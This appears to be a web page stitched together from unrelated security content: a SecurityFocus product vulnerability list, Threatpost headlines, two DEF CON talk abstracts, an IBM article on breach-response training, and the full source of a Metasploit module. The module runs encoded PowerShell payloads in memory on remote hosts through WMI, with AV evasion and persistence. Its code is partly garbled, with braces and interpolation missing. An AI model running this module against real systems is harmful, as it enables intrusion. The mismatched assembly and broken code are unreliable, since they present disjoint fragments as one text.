Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Intelligence Center 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition 0
Cisco Unified Communications Manager IM & Presence Service (formerly C 0
Cisco Unified Communications Manager (CUCM) 0
Cisco Unified Communications Domain Manager 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 0
Cisco UCS Manager 0
Cisco UCS Director 0
Cisco UCS Central Software 0
Cisco UCS B-Series Blade Servers 0
Cisco UCS 6200 Series and 6300 Series Fabric Interconnects 0
Cisco UC Integration for Microsoft Lync 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX9000 Series 0
Cisco TelePresence System TX1310 0
Cisco TelePresence System EX Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence SX Series 0
Cisco TelePresence Supervisor MSE 8050 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 820 0
Cisco TelePresence Server on Multiparty Media 310 and 320 0
Cisco TelePresence Server 7010 and MSE 8710 0
Cisco TelePresence Serial Gateway Series 0
Cisco TelePresence Profile Series 0
Cisco TelePresence MX Series 0
Cisco TelePresence MCU 0
Cisco TelePresence ISDN Link 0
Cisco TelePresence ISDN Gateway MSE 8321 0
Cisco TelePresence ISDN Gateway 3241 0
Cisco TelePresence Integrator C Series 0
Cisco TelePresence Content Server 0
Cisco TelePresence Conductor 0
Cisco TAPI Service Provider (TSP) 0
Cisco Tandberg Codian MSE 8320 0
Cisco Tandberg Codian ISDN Gateway 0
Cisco StealthWatch UDP Director 0
Cisco StealthWatch Management Console (SMC) 0
Cisco StealthWatch IDentity 0
Cisco StealthWatch FlowCollector sFlow 0
Cisco StealthWatch FlowCollector NetFlow 0
Cisco SPA525G 5-Line IP Phone 0
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 0
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 0
Cisco SPA112 2-Port Phone Adapter 0
Cisco SocialMiner 0
Cisco Smart Net Total Care - Local Collector appliance 0
Cisco Smart Care 0
Cisco Small Business 300 Series (Sx300) Managed Switches 0
Cisco Show and Share 0
Cisco Services Provisioning Platform 0
Cisco Security Manager 0
Cisco Secure Access Control System (ACS) 0
Cisco Registered Envelope Service 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for Service Providers 0
Cisco Prime Network Services Controller 0
Cisco Prime Network 0
Cisco Prime License Manager 0
Cisco Prime IP Express 0
Cisco Prime Infrastructure Plug and Play Standalone Gateway 0
Cisco Prime Data Center Network Manager -
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco Prime Collaboration Assurance 0
Cisco Prime Access Registrar 0
Cisco Partner Support Service 1.0
Cisco Paging Server (Informacast) 0
Cisco Paging Server 0
Cisco Packaged Contact Center Enterprise 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco onePK All-in-One Virtual Machine 0
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 0
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 0
Cisco Nexus 6000 Series Switches 0
Cisco Nexus 5000 Series Switches 0
Cisco Nexus 4000 Series Blade Switches 0
Cisco Nexus 1000V Series Switches 0
Cisco Network Performance Analysis 0
Cisco Network Analysis Module 0
Cisco NetFlow Generation Appliance 0
Cisco NAC Guest Server 0
Cisco NAC Appliance - Clean Access Server 0
Cisco NAC Appliance - Clean Access Manager 0
Cisco MXE 3500 Series Media Experience Engines 0
Cisco Multicast Manager 0
Cisco MediaSense 0
Cisco Media Services Interface 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Management Appliance 0
Cisco Jabber Software Development Kit 0
Cisco Jabber Guest 0
Cisco Jabber for Windows 0
Cisco Jabber for Mac 0
Cisco Jabber for iPhone and iPad 0
Cisco Jabber for Android 0
Cisco Jabber Client Framework (JCF) Components 0
Cisco IP Interoperability and Collaboration System (IPICS) 0
Cisco IP 8800 Series Phones - VPN feature 0
Cisco IP 7800 Series Phones 0
Cisco Intrusion Prevention System (IPS) Solutions 0
Cisco InTracer 0
Cisco Hosted Collaboration Mediation Fulfillment 0
Cisco FireSIGHT System Software 0
Cisco Expressway series 0
Cisco Enterprise Content Delivery System (ECDS) 0
Cisco Emergency Responder 0
Cisco Email Security Appliance (ESA) 0
Cisco Edge 340 Digital Media Player 0
Cisco Edge 300 Digital Media Player 0
Cisco DX Series IP Phones 0
Cisco Content Security Management Appliance (SMA) 0
Cisco Content Security Appliance Update Servers 0
Cisco Connected Grid Routers 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Common Services Platform Collector 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cloud Web Security 0
Cisco Cloud Object Storage 0
Cisco Clean Access Manager 0
Cisco ATA 190 Series Analog Terminal Adaptors 0
Cisco ATA 187 Analog Telephone Adaptor 0
Cisco ASR 5000 Series 0
Cisco ASA Next-Generation Firewall Services 0
Cisco Application Policy Infrastructure Controller (APIC) 0
Cisco Application and Content Networking System (ACNS) 0
Cisco AnyConnect Secure Mobility Client for Windows 0
Cisco AnyConnect Secure Mobility Client for Mac OS X 0
Cisco AnyConnect Secure Mobility Client for Linux 0
Cisco AnyConnect Secure Mobility Client for iOS 0
Cisco AnyConnect Secure Mobility Client for desktop platforms 0
Cisco AnyConnect Secure Mobility Client for Android 0
Cisco Aironet 2700 Series Access Points 0
Cisco Agent for OpenFlow 0
Cisco Agent Desktop for Cisco Unified Contact Center Express 0
Cisco Adaptive Security Appliance (ASA) 0
Cisco ACE30 Application Control Engine Module 0
Cisco ACE 4710 Application Control Engine 0
Cisco 910 Industrial Router 0
Cisco 500 Series Stackable (Sx500) Managed Switches 0
Cisco 4400 Series Digital Media Players 0
Cisco 4300 Series Digital Media Players 0
Cisco 220 Series Smart Plus (Sx220) Switches 0 Not Vulnerable: Pexip Pexip Infinity 13
Oracle VM VirtualBox 5.1.8
Oracle VM VirtualBox 5.0.28
OpenSSL Project OpenSSL 1.1
OpenSSL Project OpenSSL 1.0.2i
OpenSSL Project OpenSSL 1.0.1u
IBM Sterling Connect:Express for UNIX 1.5.0.13 iFix 150-13
IBM SDK for Node.js 6.7.0.0
IBM SDK for Node.js 4.6.0.0
IBM SDK for Node.js 1.2.0.15
IBM SDK for Node.js 1.1.1.4
IBM BigFix Remote Control 9.1.3
Cisco Wireless Lan Controller 8.4
Cisco WebEx Meetings Server 2.6.1.30
Cisco WebEx Meetings for Windows Phone 8 2.8
Cisco WebEx Meetings Client - On-Premises T32
Cisco WebEx Meetings Client - Hosted T32
Cisco WebEx Centers T32
Cisco Virtualization Experience Media Edition 11.8
Cisco Virtual Security Gateway 2.1.6
Cisco Videoscape AnyRes Live 9.7.2
Cisco Video Surveillance PTZ IP Cameras 2.9
Cisco Video Surveillance 7000 Series IP Cameras 2.9
Cisco Video Surveillance 6000 Series IP Cameras 2.9
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 2.9
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 2.9
Cisco Video Surveillance 3000 Series IP Cameras 2.9
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 4.003(002)
Cisco Universal Small Cell Iuh 3.17.3
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 3.17.3
Cisco Universal Small Cell 7000 Series 3.5.12.23
Cisco Universal Small Cell 5000 Series 3.5.12.23
Cisco Unity Express 10
Cisco Unified Workforce Optimization - Quality Management Solution 11.5(1)SU1
Cisco Unified SIP Proxy Software 10
Cisco Unified MeetingPlace 8.6MR1
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 9.3(4)SR3
Cisco Unified IP 8831 Conference Phone 10.3.1SR4
Cisco Unified IP 6901 Phone 9.3(1)SR3
Cisco Unified Intelligent Contact Management Enterprise 11.6.1
Cisco Unified Intelligence Center 11.6(1)
Cisco Unified Contact Center Express 11.6
Cisco Unified Contact Center Enterprise 11.6.1
Cisco UCS Standalone C-Series Rack Server - Integrated Management Cont 3.0
Cisco UCS B-Series Blade Servers 3.1.3
Cisco UC Integration for Microsoft Lync 11.6.3
Cisco TelePresence Video Communication Server (VCS) X8.8.3
Cisco TelePresence TX9000 Series 6.1
Cisco TelePresence System TX1310 6.1
Cisco TelePresence System EX Series TC7.3.7
Cisco TelePresence System EX Series CE8.2.2
Cisco Telepresence System 500-37 6.1
Cisco Telepresence System 500-32 6.1
Cisco TelePresence System 3000 Series 6.1
Cisco Telepresence System 1300 6.1
Cisco Telepresence System 1100 6.1
Cisco Telepresence System 1000 6.1
Cisco TelePresence SX Series TC7.3.7
Cisco TelePresence SX Series CE8.2.2
Cisco TelePresence Server on Multiparty Media 820 4.4
Cisco TelePresence Server on Multiparty Media 310 and 320 4.4
Cisco TelePresence Server 7010 and MSE 8710 4.4
Cisco TelePresence Profile Series TC7.3.7
Cisco TelePresence Profile Series CE8.2.2
Cisco TelePresence MX Series TC7.3.7
Cisco TelePresence MX Series CE8.2.2
Cisco TelePresence MCU 4.5(1.89)
Cisco TelePresence Integrator C Series TC7.3.7
Cisco TelePresence Integrator C Series CE8.2.2
Cisco SPA232D Multi-Line DECT Analog Telephone Adapter (ATA) 1.4.2
Cisco SPA122 Analog Telephone Adapter (ATA) with Router 1.4.2
Cisco SPA112 2-Port Phone Adapter 1.4.2
Cisco Services Provisioning Platform SFP1.1
Cisco Security Manager 4.13
Cisco Secure Access Control System (ACS) 5.8.0.32.8
Cisco Secure Access Control System (ACS) 5.8.0.32.7
Cisco Prime Performance Manager 1.7 SP1611
Cisco Prime Network Services Controller 1.01u
Cisco Prime Network Registrar 8.3.5
Cisco Prime Network Registrar 9.0
Cisco Prime Network 431
Cisco Prime Infrastructure 3.2
Cisco Prime Collaboration Provisioning 11.6
Cisco Prime Collaboration Assurance 11.6
Cisco ONS 15454 Series Multiservice Provisioning Platforms 10.7
Cisco Nexus 9000 Series Switches - Standalone NX-OS mode 7.0(3)I5(1)
Cisco Nexus 9000 Series Fabric Switches - ACI mode 0
Cisco Nexus 7000 Series Switches 6.2.19
Cisco Nexus 7000 Series Switches 5.2.8(i)
Cisco Nexus 6000 Series Switches 6.2.19
Cisco Nexus 6000 Series Switches 5.2.8(i)
Cisco Nexus 5000 Series Switches 6.2.19
Cisco Nexus 5000 Series Switches 5.2.8(i)
Cisco Nexus 4000 Series Blade Switches 4.1(2)E1(1r)
Cisco Nexus 1000V Series Switches 5.2(1)SV3(2.5)
Cisco Network Analysis Module 6.2(2)
Cisco Network Analysis Module 6.2(1-b)
Cisco NetFlow Generation Appliance 1.1(1)
Cisco MDS 9000 Series Multilayer Switches 6.2.19
Cisco MDS 9000 Series Multilayer Switches 5.2.8(i)
Cisco Jabber Software Development Kit 11.8
Cisco Jabber Guest 11
Cisco Jabber for Windows 11.8
Cisco Jabber for Mac 11.8
Cisco Jabber for iPhone and iPad 11.8
Cisco Jabber for Android 11.8
Cisco Jabber Client Framework (JCF) Components 11.8
Cisco IP Interoperability and Collaboration System (IPICS) 5.0(1)
Cisco IOS and Cisco IOS XE Software 16.4
Cisco IOS and Cisco IOS XE Software 16.3
Cisco IOS and Cisco IOS XE Software 16.2
Cisco IOS and Cisco IOS XE Software 16.1
Cisco IOS and Cisco IOS XE Software 15.5(3)
Cisco FireSIGHT System Software 6.1.0.1
Cisco FireSIGHT System Software 6.0.1.3
Cisco FireSIGHT System Software 5.4.1.9
Cisco FireSIGHT System Software 5.4.0.10
Cisco Expressway series X8.8.3
Cisco Enterprise Content Delivery System (ECDS) 2.6.9
Cisco Email Security Appliance (ESA) 10.0.1
Cisco Edge 340 Digital Media Player 1.2RB1.0.3
Cisco Edge 300 Digital Media Player 1.6RB5
Cisco Digital Media Manager 5.4.1_RB4
Cisco Digital Media Manager 5.3.6_RB3
Cisco DCM Series D9900 Digital Content Manager 0
Cisco Content Security Management Appliance (SMA) 6.1.140
Cisco Connected Grid Routers 15.8.9
Cisco Connected Grid Routers 7.3
Cisco Computer Telephony Integration Object Server (CTIOS) 11.6.1
Cisco Common Services Platform Collector 1.11
Cisco ATA 190 Series Analog Terminal Adaptors 1.3
Cisco ASR 5000 Series 21.2
Cisco ASA Next-Generation Firewall Services 2.1.2
Cisco Application Policy Infrastructure Controller (APIC) 2.2(1)
Cisco AnyConnect Secure Mobility Client for Windows 4.0.7
Cisco AnyConnect Secure Mobility Client for Mac OS X 4.0.7
Cisco AnyConnect Secure Mobility Client for Linux 4.0.7
Cisco AnyConnect Secure Mobility Client for iOS 4.0.7
Cisco AnyConnect Secure Mobility Client for desktop platforms 4.3.4
Cisco AnyConnect Secure Mobility Client for desktop platforms 4.4
Cisco AnyConnect Secure Mobility Client for Android 4.0.7
Cisco Aironet 2700 Series Access Points 16.4
Cisco Aironet 2700 Series Access Points 16.3
Cisco Aironet 2700 Series Access Points 16.2
Cisco Aironet 2700 Series Access Points 16.1
Cisco Aironet 2700 Series Access Points 15.5(3)
Cisco 910 Industrial Router 1.2.1RB4
Cisco 4400 Series Digital Media Players 5.4.1_RB4
Cisco 4400 Series Digital Media Players 5.3.6_RB3
Cisco 4300 Series Digital Media Players 5.4.1_RB4
Cisco 4300 Series Digital Media Players 5.3.6_RB3


SecurityFocus Vulnerabilities

Dyn Confirms DDoS Attack Affecting Twitter, Github, Many Others

October 21, 2016 , 10:01 am

IoT Botnets Are The New Normal of DDoS Attacks

October 5, 2016 , 8:51 am

Leftover Factory Debugger Doubles as Android Backdoor

October 14, 2016 , 9:00 am

iPhone Call History Synced to iCloud Without User Consent, Knowledge

November 17, 2016 , 1:51 pm

Cryptsetup Vulnerability Grants Root Shell Access on Some Linux Systems

November 15, 2016 , 3:28 pm

Microsoft Patches Zero Day Disclosed by Google

November 8, 2016 , 2:57 pm

Microsoft Says Russian APT Group Behind Zero-Day Attacks

November 1, 2016 , 5:50 pm

Google to Make Certificate Transparency Mandatory By 2017

October 29, 2016 , 6:00 am

Microsoft Extends Malicious Macro Protection to Office 2013

October 27, 2016 , 4:27 pm

Dyn DDoS Work of Script Kiddies, Not Politically Motivated Hackers

October 25, 2016 , 3:00 pm

Mirai-Fueled IoT Botnet Behind DDoS Attacks on DNS Providers

October 22, 2016 , 6:00 am

FruityArmor APT Group Used Recently Patched Windows Zero Day

October 20, 2016 , 7:00 am

Experts ‘Outraged’ by Warrant Demanding Fingerprints to Unlock Smartphones

October 18, 2016 , 4:58 pm

Researchers Break MarsJoke Ransomware Encryption

October 3, 2016 , 5:00 am

OpenSSL Fixes Critical Bug Introduced by Latest Update

September 26, 2016 , 10:45 am

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Facebook Debuts Open Source Detection Tool for Windows

September 27, 2016 , 12:24 pm

Serious Dirty Cow Linux Vulnerability Under Attack

October 21, 2016 , 11:21 am

Popular Android App Leaks Microsoft Exchange User Credentials

October 14, 2016 , 8:00 am

Cisco Warns of Critical Flaws in Nexus Switches

October 7, 2016 , 10:55 am

Free Tool Protects Mac Users from Webcam Surveillance

October 7, 2016 , 7:00 am


Threatpost | The first stop for security news

Security products should make our computers more secure, not less. Little Snitch is the de facto personal firewall for OS X that aims to secure a Mac by blocking unauthorized network traffic. Unfortunately bypassing this firewall's network monitoring mechanisms is trivial...and worse yet, the firewall's kernel core was found to contain an exploitable ring-0 heap-overflow. #fail Though briefly touching on generic firewall bypass techniques, this talk will largely focus on the kernel-mode vulnerability. Specifically, I’ll discuss bypassing OS X specific anti-debugging mechanisms employed by the product, reverse-engineering the firewall's I/O Kit kernel interfaces and 'authentication' mechanisms, and the discovery of the exploitable heap-overflow.

Finally, methods of exploitation will be briefly discussed, including how an Apple kernel-fix made this previously un-exploitable bug, exploitable on OS X 10.11

So if you simply want to see yet another 'security' product fall, or more generically, learn methods of OS X kernel extension reversing in a practical manner, then this talk is for you 🙂

Bio:
Patrick Wardle is the Director of Research at Synack, where he leads cyber R&D efforts. Having worked at NASA, the NSA, and Vulnerability Research Labs (VRL), he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick’s focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware. In his personal time, Patrick collects OS X malware and writes free OS X security tools. Both can be found on his website; www.Objective-See.com


DEF CON Announcements!

Gary Numan said it best. Cars. They’re everywhere. You can hardly drive down a busy freeway without seeing one. But what about their security?

In this talk I’ll reveal new research and real attacks in the area of wirelessly controlled gates, garages, and cars. Many cars are now controlled from mobile devices over GSM, while even more can be unlocked and ignitions started from wireless keyfobs over RF. All of these are subject to attack with low-cost tools (such as RTL-SDR, GNU Radio, HackRF, Arduino, and even a Mattel toy).

We will investigate how these features work, and of course, how they can be exploited. I will be releasing new tools and vulnerabilities in this area, such as key-space reduction attacks on fixed-codes, advanced "code grabbers" using RF attacks on encrypted and rolling codes, and how to protect yourself against such issues.

By the end of this talk you’ll understand not only how vehicles and the wirelessly-controlled physical access protecting them can be exploited, but also learn about various tools for car and RF research, as well as how to use and build your own inexpensive devices for such investigation.

Ladies and gentlemen, start your engines. And other people’s engines.

Samy Kamkar is a security researcher, best known for creating The MySpace Worm, one of the fastest spreading viruses of all time. He (attempts to) illustrate terrifying vulnerabilities with playfulness, and his exploits have been branded:

“Controversial”, -The Wall Street Journal
“Horrific”, -The New York Times
“Now I want to fill my USB ports up with cement”, -Gizmodo

He’s demonstrated usurping typical hardware for surreptitious means such as with KeySweeper, turning a standard USB wall charger into a covert, wireless keyboard sniffer, and SkyJack, a custom drone which takes over any other nearby drones allowing them to be controlled as a massive zombie swarm. He’s exposed issues around privacy, such as by developing the Evercookie which appeared in a top-secret NSA document revealed by Edward Snowden, exemplifying techniques used by governments and corporations for clandestine web tracking, and has discovered and released research around the illicit GPS and location tracking performed by Apple, Google and Microsoft mobile devices. He continues to produce new research and tools for the public as open source and open hardware.

Twitter: @samykamkar


DEF CON Announcements!

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/powershell'
require 'msf/core/post/windows/priv'
require 'msf/core/exploit/powershell/dot_net'

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::Windows::Powershell
include Msf::Exploit::Powershell::DotNet
include Msf::Post::Windows::Priv

def initialize(info=)
super(update_info(info,
'Name' => "Authenticated WMI Exec via Powershell",
'Description' => %q
This module uses WMI execution to launch a payload instance on a remote machine.
In order to avoid AV detection, all execution is performed in memory via psh-net
encoded payload. Persistence option can be set to keep the payload looping while
a handler is present to receive it. By default the module runs as the current
process owner. The module can be configured with credentials for the remote host
with which to launch the process.
,
'License' => MSF_LICENSE,
'Author' => 'RageLtMan <rageltman[at]sempervictus>',
'DefaultOptions' =>

'EXITFUNC' => 'thread',
,
'Payload' => 'Space' => 8192 ,
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Universal', ] ],
'DefaultTarget' => 0,
'DisclosureDate'=> "Aug 19 2012"

))

register_options(
[
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
OptString.new('USERNAME', [false, "Username to authenticate as"]),
OptString.new('PASSWORD', [false, "Password to authenticate with"]),
OptString.new('DOMAIN', [false, "Domain or machine name"]),

], self.class)

register_advanced_options(
[
OptBool.new('PowerShellPersist', [false, 'Run the payload in a loop']),
OptBool.new('RunRemoteWow64', [
false,
'Execute powershell in 32bit compatibility mode, payloads need native arch',
false
]),

], self.class)

end

def build_script
run_opts =
run_opts[:username] = datastore['USERNAME']
run_opts[:domain] = datastore['DOMAIN'] || '.'
run_opts[:password] = datastore['PASSWORD']

# End of file marker
eof = Rex::Text.rand_text_alpha(8)
env_suffix = Rex::Text.rand_text_alpha(8)

# Create base64 encoded payload
psh_payload_raw = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.raw)
if datastore['PowerShellPersist']
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
sleep_time = rand(5)+5
psh_payload = "function #fun_name#psh_payload;while(1)Start-Sleep -s #{sleep_time;#fun_name;1}"
end
psh_payload = compress_script(psh_payload_raw, eof)
# WMI exec function - this is going into powershell.rb after pull 701 is commited
script = ps_wmi_exec(run_opts)
# Build WMI exec calls to every host into the script to reduce PS instances
# Need to address arch compat issue here, check powershell.exe arch, check pay arch
# split the hosts into wow64 and native, and run each range separately
ps_bin = datastore['RunRemoteWow64'] ? 'cmd /c %windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
# for whatever reason, passing %systemroot% instead of 'C:\windows' fails

if datastore["RHOSTS"]
# Iterate through our hosts list adding a call to the WMI wrapper for each.
# This should learn to differentiate between hosts and call WOW64 as appropriate,
# as well as putting the payload into a variable when many hosts are hit so the
# uploaded script is not bloated since each encoded payload is bulky.

Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |host|
if run_opts[:username] and run_opts[:password]
script << " New-RemoteProcess -rhost \"#host\" -login \"#run_opts[:domain]\#run_opts[:username]\""
script << " -pass '#run_opts[:password]' -cmd \"#ps_bin -EncodedCommand #psh_payload\";"
else
script << " New-RemoteProcess -rhost \"#host\" -cmd \"#ps_bin -EncodedCommand #psh_payload\";"
end
end
else
print_status('Running Locally')
script = psh_payload_raw
end
return script
end

def exploit
# Make sure we meet the requirements before running the script
unless have_powershell?
fail_with(Failure::BadConfig, 'PowerShell not found')
end

# SYSTEM doesnt have credentials on remote hosts
if is_system? and datastore['RHOSTS']
print_error("Cannot run as local system on remote hosts")
return 0
end

script = build_script

if datastore['Powershell::Post::dry_run']
print_good script
return
end

begin
psh_output = datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)
print_good(psh_output)
rescue Rex::TimeoutError => e
elog("#e.class #e.message\n#e.backtrace * "\n"")
end

vprint_good('PSH WMI exec is complete.')
end

# Wrapper function for instantiating a WMI win32_process
# class object in powershell.
# Insantiates the [wmiclass] object and configures the scope
# Sets impersonation level and injects credentials as needed
# Configures application startup options to hide the newly
# created window. Adds start-up check for remote proc.
def ps_wmi_exec(opts = )

ps_wrapper = <<EOS
Function New-RemoteProcess
Param([string]$ rhost,[string]$ cmd,[string]$ login,[string]$ pass)
$ ErrorActionPreference="SilentlyContinue"
$ proc = [WMIClass]"\\$ rhost\root\cimv2:Win32_Process"
EOS
if opts[:username] and opts[:password]
ps_wrapper += <<EOS
$ proc.psbase.Scope.Options.userName = $ login
$ proc.psbase.Scope.Options.Password = $ pass
EOS
end
ps_wrapper += <<EOS
$ proc.psbase.Scope.Options.Impersonation = [System.Management.ImpersonationLevel]::Impersonate
$ proc.psbase.Scope.Options.Authentication = [System.Management.AuthenticationLevel]::PacketPrivacy
$ startup = [wmiclass]"Win32_ProcessStartup"
$ startup.Properties['ShowWindow'].value=$ False
$ remote = $ proc.Create($ cmd,'C:\',$ startup)
if ($ remote.returnvalue -eq 0) {
Write-Host "Successfully launched on $ rhost with a process id of" $ remote.processid
else
Write-Host "Failed to launch on $ rhost. ReturnValue is" $ remote.ReturnValue

}

EOS

return ps_wrapper
end

end

#
# Ideally the methods to create WMI wrapper functions and their callers
# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
#


Exploit Files ≈ Packet Storm

You are driving in your car with your 10-year-old son in the passenger’s seat. A ball bounces in front of your car and you hit the brakes hard while simultaneously throwing your arm in front of the child, acting almost automatically. That’s called muscle memory, and it is a big part of what organizations need when responding to cyberattacks.

Cyberattack Defense Is Muscle Memory

When asked how to launch an effective cyberattack defense effort, most people give technology-related answers: Beef up the firewalls, fortify the network, and deploy better intrusion detection and security analytics solutions.

While technology is certainly important, the responses coming from your organization during and following the attack — the human side of the equation — are even more vital. Yet despite a wealth of good advice, I estimate that in 8 of the last 10 large-scale breaches, the response from the organization under attack did as much or more damage than the attack itself. Most of that damage was reputational.

Why is that? Very few C-level executives have been trained in crisis leadership. They seldom have to make urgent decisions in near-real time. The usual practice is to build a team around executives to provide input. They carefully study these inputs and weigh them against other information to develop a set of options. Eventually, they fashion a response. This could happen days or weeks later — or, in some cases, not at all.

The Worst Response Is No Response

That explains why the response to a major breach is so often little or no response at all. Often the blame is directed at some vague state-sponsored source when, in reality, the company has no legitimate suspects because attribution is very difficult. That’s when problems arise beyond the actual damage from the breach. Customers worry about their personal information. Suppliers and partners get antsy. Tort lawyers start to circle overhead. Confidence in the organization drops while suspicion mounts.

Most all of this post-attack damage is avoidable and unnecessary. First, all organizations must presume that they will fall victim to a major breach at some point. There is no safe harbor, as should be evident to anyone listening to the news these days.

Second, the management team needs to undergo in-depth training in crisis management when an attack does happen. This team needs to prepare and rehearse responses for customers, suppliers, regulators, the media and the board. Of the 50 states in the U.S., for example, 47 of them have their own unique breach disclosure laws. You must develop a plan in advance that comply with these laws specific to any states in which you do business. These responses must be ingrained as executive muscle memory.

Filling the Gaps

To help IT professionals thoroughly prepare to deal with cyberattacks, IBM opened its X-Force Command Center (XFCC), a simulator designed to train executives in the crisis leadership skills they’ll need to respond to a breach. In the all-day course at the XFCC, teams will first experience a highly realistic, simulated cyberattack. They’ll be exposed to the variety of ways the technical staff tries to detect and stop the attack and then swing into recovery mode.

Participants will spend the second half of the day planning the proper response steps and rehearsing them. The central idea is to infuse executives with the confidence and experience of doing something that their MBA training and business experience likely failed to address. Leadership during a cyberattack defense effort requires a full-throttle response in hours, not days or weeks.

Discover How IBM X-Force Command Centers Are Changing Security

A Predetermined, Definitive Response

Think back to the Tylenol scandal of 1982, when criminals tampered with bottles and laced the pain-relieving pills with poison that killed several people. Tylenol’s maker, Johnson & Johnson, immediately removed the product from all store shelves, even though there was no indication of a manufacturing problem. The parent company trusted its brand to survive such a hit, and indeed it did. The company was widely applauded for its leadership in a time of crisis and its near-instant response.

Breaches will continue to happen, possibly even at an accelerated pace, given the growing interconnectivity all around us and the expanding threat surface that comes with it. The worst thing a company can do in response is what so many end up doing — nothing. Instead, be prepared to meet the crisis with predetermined, definitive responses.

Learn More

Interested in learning more about how IBM’s X-Force Command Centers will help clients stay ahead of the most advanced threats?

  • Visit the XFCC website;
  • Read the datasheet: How IBM X-Force Command Centers Are Changing Security;
  • Download the white paper: The Role of Cyber Ranges and Capture the Flag Exercises in Security Incident Response Planning;
  • Watch the video.


Security Intelligence